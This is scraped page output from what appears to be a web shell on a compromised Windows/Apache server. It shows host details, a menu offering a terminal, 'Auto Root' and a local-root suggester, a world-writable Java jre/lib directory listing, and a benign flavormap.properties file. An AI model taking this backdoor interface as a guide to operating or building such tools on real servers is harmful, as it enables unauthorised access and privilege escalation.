Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Program Files (x86) /
Java /
jdk1.7.0_79 /
jre /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
applet
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
cmm
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
deploy
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
ext
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
fonts
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
i386
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
images
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
jfr
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
management
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
security
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
zi
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
accessibility.properties
155
B
-rw-rw-rw-
2023-10-12 23:53
alt-rt.jar
168.72
KB
-rw-rw-rw-
2023-10-12 23:53
calendars.properties
1.2
KB
-rw-rw-rw-
2023-10-12 23:53
charsets.jar
3.48
MB
-rw-rw-rw-
2023-10-12 23:53
classlist
73.32
KB
-rw-rw-rw-
2023-10-12 23:53
content-types.properties
5.42
KB
-rw-rw-rw-
2023-10-12 23:53
currency.data
3.98
KB
-rw-rw-rw-
2023-10-12 23:53
deploy.jar
4.48
MB
-rw-rw-rw-
2023-10-12 23:53
flavormap.properties
3.84
KB
-rw-rw-rw-
2023-10-12 23:53
fontconfig.bfc
3.58
KB
-rw-rw-rw-
2023-10-12 23:53
fontconfig.properties.src
10.23
KB
-rw-rw-rw-
2023-10-12 23:53
javafx.properties
29
B
-rw-rw-rw-
2023-10-12 23:53
javaws.jar
881.92
KB
-rw-rw-rw-
2023-10-12 23:53
jce.jar
108.2
KB
-rw-rw-rw-
2023-10-12 23:53
jfr.jar
518.17
KB
-rw-rw-rw-
2023-10-12 23:53
jfxrt.jar
14.45
MB
-rw-rw-rw-
2023-10-12 23:53
jsse.jar
571.67
KB
-rw-rw-rw-
2023-10-12 23:53
jvm.hprof.txt
4.13
KB
-rw-rw-rw-
2023-10-12 23:53
launcher.exe
39.41
KB
-rwxrwxrwx
2023-10-12 23:53
logging.properties
2.4
KB
-rw-rw-rw-
2023-10-12 23:53
management-agent.jar
385
B
-rw-rw-rw-
2023-10-12 23:53
meta-index
2.08
KB
-rw-rw-rw-
2023-10-12 23:53
net.properties
3
KB
-rw-rw-rw-
2023-10-12 23:53
plugin.jar
1.85
MB
-rw-rw-rw-
2023-10-12 23:53
psfont.properties.ja
2.73
KB
-rw-rw-rw-
2023-10-12 23:53
psfontj2d.properties
10.15
KB
-rw-rw-rw-
2023-10-12 23:53
resources.jar
2.35
MB
-rw-rw-rw-
2023-10-12 23:53
rt.jar
57.35
MB
-rw-rw-rw-
2023-10-12 23:53
sound.properties
1.18
KB
-rw-rw-rw-
2023-10-12 23:53
tzmappings
7.95
KB
-rw-rw-rw-
2023-10-12 23:53
Save
Rename
# # This properties file is used to initialize the default # java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform- # specific, default mappings between common Win32 Clipboard atoms and platform- # independent MIME type strings, which will be converted into # java.awt.datatransfer.DataFlavors. # # These default mappings may be augmented by specifying the # # AWT.DnD.flavorMapFileURL # # property in the appropriate awt.properties file. The specified properties URL # will be loaded into the SystemFlavorMap. # # The standard format is: # # <native>=<MIME type> # # <native> should be a string identifier that the native platform will # recognize as a valid data format. <MIME type> should specify both a MIME # primary type and a MIME subtype separated by a '/'. The MIME type may include # parameters, where each parameter is a key/value pair separated by '=', and # where each parameter to the MIME type is separated by a ';'. # # Because SystemFlavorMap implements FlavorTable, developers are free to # duplicate both native keys and DataFlavor values. If a mapping contains a # duplicate key or value, earlier mappings which included this key or value # will be preferred. # # Mappings whose values specify DataFlavors with primary MIME types of # "text", and which support the charset parameter, should specify the exact # format in which the native platform expects the data. The "charset" # parameter specifies the char to byte encoding, the "eoln" parameter # specifies the end-of-line marker, and the "terminators" parameter specifies # the number of terminating NUL bytes. Note that "eoln" and "terminators" # are not standardized MIME type parameters. They are specific to this file # format ONLY. They will not appear in any of the DataFlavors returned by the # SystemFlavorMap at the Java level. # # If the "charset" parameter is omitted, or has zero length, the platform # default encoding is assumed. If the "eoln" parameter is omitted, or has # zero length, "\n" is assumed. If the "terminators" parameter is omitted, # or has a value less than zero, zero is assumed. # # Upon initialization, the data transfer subsystem will record the specified # details of the native text format, but the default SystemFlavorMap will # present a large set of synthesized DataFlavors which map, in both # directions, to the native. After receiving data from the application in one # of the synthetic DataFlavors, the data transfer subsystem will transform # the data stream into the format specified in this file before passing the # transformed stream to the native system. # # Mappings whose values specify DataFlavors with primary MIME types of # "text", but which do not support the charset parameter, will be treated as # opaque, 8-bit data. They will not undergo any transformation process, and # any "charset", "eoln", or "terminators" parameters specified in this file # will be ignored. # # See java.awt.datatransfer.DataFlavor.selectBestTextFlavor for a list of # text flavors which support the charset parameter. UNICODE\ TEXT=text/plain;charset=utf-16le;eoln="\r\n";terminators=2 TEXT=text/plain;eoln="\r\n";terminators=1 HTML\ Format=text/html;charset=utf-8;eoln="\r\n";terminators=1 Rich\ Text\ Format=text/rtf HDROP=application/x-java-file-list;class=java.util.List PNG=image/x-java-image;class=java.awt.Image JFIF=image/x-java-image;class=java.awt.Image DIB=image/x-java-image;class=java.awt.Image ENHMETAFILE=image/x-java-image;class=java.awt.Image METAFILEPICT=image/x-java-image;class=java.awt.Image LOCALE=application/x-java-text-encoding;class="[B" UniformResourceLocator=application/x-java-url;class=java.net.URL UniformResourceLocator=text/uri-list;eoln="\r\n";terminators=1 UniformResourceLocator=text/plain;eoln="\r\n";terminators=1 FileGroupDescriptorW=application/x-java-file-list;class=java.util.List FileGroupDescriptor=application/x-java-file-list;class=java.util.List